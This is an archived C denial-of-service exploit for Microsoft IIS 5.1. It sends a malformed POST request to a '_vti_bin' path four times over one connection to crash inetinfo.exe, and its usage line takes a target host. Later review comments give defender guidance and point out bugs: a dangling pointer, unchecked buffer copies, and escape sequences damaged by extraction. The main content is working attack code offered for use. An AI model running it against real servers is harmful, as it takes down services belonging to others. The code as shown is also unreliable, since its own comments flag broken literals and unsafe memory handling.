# Title : MS Windows IIS Malformed HTTP Request Denial of Service Exploit (c)
# Published : 2005-12-19
# Author : Kozan
/*****************************************************************
Microsoft IIS 5.1 Remote D.o.S Exploit by Kozan
Application: Microsoft IIS (Internet Information Server)
Vendor: Microsoft - http://www.microsoft.com/
Discovered by: Inge Henriksen
Exploit Coded by: Kozan
Credits to ATmaCA, Inge Henriksen
Web: www.spyinstructors.com
Mail: kozan@spyinstructors.com
Vulnerable:
Microsoft Internet Information Server V5.1
Not vulnerable:
Microsoft Internet Information Server V5.0
Microsoft Internet Information Server V6.0
Only folders with Execute Permissions set to 'Scripts & Executables'
are affected, such as the '_vti_bin' directory. Folders without that
setting are not affected, so an exposure review starts with listing
which folders carry it.
inetinfo.exe crashes after successful exploitation.
Usage: iis51dos.exe [Target Url or IP]
*****************************************************************/
#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")
// Formats the HTTP request text for pszHost into a 1000-byte local buffer and
// returns a pointer to that buffer.
//
// pszHost: value placed in the Host: header; main() passes its copy of argv[1].
//
// Defects visible in this block:
//  - szHeader is an automatic array, so the returned pointer refers to storage
//    whose lifetime ends when this function returns. The caller copies from it
//    afterwards, which is undefined behavior; whether the text survives depends
//    on the compiler and stack layout.
//  - wsprintf takes no destination size and pszHost is not length-checked, so a
//    long host string can write past the 1000-byte buffer.
//
// Defender's view: the request line is a POST to a path under /_vti_bin/ with
// Content-Length 0. The header comment states that only folders whose Execute
// Permissions are 'Scripts & Executables' are affected, so that path and that
// permission setting are what to look for in web logs and site configuration.
//
// NOTE(review): the "rn" sequences in the literals look like escape sequences
// damaged by the page extraction; the text is kept exactly as archived.
char *HttpHeader(char *pszHost)
{
char szHeader[1000];
wsprintf( szHeader, "POST /_vti_bin/.dll/*/~0 HTTP/1.1rn"
"Content-Type: application/x-www-form-urlencodedrn"
"Host: %srn"
"Content-Length: 0rnrn"
, pszHost
);
// Returns the address of a local array (dangling once the function returns).
return szHeader;
}
// Entry point: prints a banner, takes exactly one argument (the target host),
// resolves it, opens one TCP connection to port 80 and sends the same request
// text four times on that connection without reading any response.
//
// Returns 0 after the four sends complete, -1 on a usage error or on any
// failure this function detects.
//
// Defender's view: on the wire this is four identical POST requests in quick
// succession over a single connection from one client, with an empty body.
// The header comment says inetinfo.exe crashes on an affected IIS 5.1 host, so
// an unexpected inetinfo.exe termination that follows such requests in the
// logs is the correlating signal.
//
// NOTE(review): "n", "nn" and "t" inside the message literals look like
// escape sequences damaged by the page extraction; kept as archived.
int main(int argc, char *argv[])
{
fprintf(stdout, "nnMicrosoft IIS 5.1 Remote D.o.S Exploit by Kozann"
"Bug Discovered by: Inge Henriksenn"
"Exploit Coded by: Kozann"
"Credits to ATmaCA, Inge Henriksenn"
"www.spyinstructors.com - kozan@spyinstructors.comnn"
);
// Exactly one command-line argument is required.
if( argc != 2 )
{
fprintf(stderr, "nnUsage:t%s [WebSiteUrl]nn", argv[0]);
return -1;
}
WSADATA wsaData;
struct hostent *pTarget;
struct sockaddr_in addr;
SOCKET sock;
char szHeader[1000], szWebUrl[1000];
// argv[1] is copied into a fixed 1000-byte buffer with no length check, so a
// longer argument writes past szWebUrl.
lstrcpy(szWebUrl, argv[1]);
// Copies from the pointer HttpHeader() returned; that pointer refers to
// HttpHeader's local array, which no longer exists at this point.
lstrcpy(szHeader, HttpHeader(szWebUrl));
// 0x0101 requests Winsock version 1.1. WSAStartup returns 0 on success and a
// nonzero error code otherwise, so this "< 0" test is not expected to catch a
// startup failure.
if( WSAStartup(0x0101,&wsaData) < 0 )
{
fprintf(stderr, "Winsock error!n");
return -1;
}
sock = socket(AF_INET,SOCK_STREAM,0);
if( sock == -1 )
{
fprintf(stderr, "Socket error!n");
// Returns without WSACleanup().
return -1;
}
// The argument is resolved as a host name, so it has to be a bare host or IP
// string rather than a full URL.
if( (pTarget = gethostbyname(szWebUrl)) == NULL )
{
fprintf(stderr, "Address resolve error!n");
// Returns without closesocket(sock) or WSACleanup().
return -1;
}
memcpy(&addr.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
addr.sin_family = AF_INET;
// The destination port is fixed at 80.
addr.sin_port = htons(80);
// As listed, this fills the sin_zero padding with the space character.
// NOTE(review): the field name suggests a zero fill was intended; the fill
// character may be another escape lost in extraction.
memset(&(addr.sin_zero), ' ', 8);
fprintf(stdout, "Please wait while connecting...n");
if( connect( sock, (struct sockaddr*)&addr, sizeof(struct sockaddr) ) == -1 )
{
fprintf(stderr, "Connection failed!n");
closesocket(sock);
return -1;
}
fprintf(stdout, "Connected.nn");
fprintf(stdout, "Please wait while sending DoS request headers...nn");
// Sends the same buffer four times on the one open connection; no recv() is
// made, so the program never observes how the server answered.
for( int i=0; i<4; i++ )
{
fprintf(stdout, "Sending %d. request...n", i+1);
if( send(sock, szHeader, lstrlen(szHeader),0) == -1 )
{
fprintf(stderr, "%d. DoS request header could not sent!n", i+1);
closesocket(sock);
return -1;
}
fprintf(stdout, "%d. request sent.nn", i+1);
}
// "Completed" here means only that the four send() calls did not fail.
fprintf(stdout, "Operation completed...n");
closesocket(sock);
WSACleanup();
return 0;
}